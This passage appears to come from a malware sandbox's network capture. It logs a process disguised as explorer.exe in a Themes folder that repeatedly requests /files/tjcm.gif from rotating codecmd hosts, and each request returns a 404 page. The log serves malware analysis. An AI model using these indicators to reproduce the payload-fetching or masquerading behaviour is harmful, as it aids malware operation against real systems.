25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:20.895939112 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.651196108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:21.309313059 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:22.019543886 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:21 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:22.019562960 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.651197142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:22.422595978 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:23.128704071 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:23 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:23.128781080 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.2.651198172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:23.583096027 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:24.129851103 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:24 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:24.129874945 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.2.651199108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:24.504199028 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:25.214526892 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:25 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:25.214555025 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.2.651200142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:25.506273031 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:26.214263916 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:26 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:26.214282990 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              51192.168.2.651201172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:26.446643114 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:27.256365061 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:26 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:27.256386995 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:09:27.256397009 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              52192.168.2.651202108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:28.044200897 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:28.747868061 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:28 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
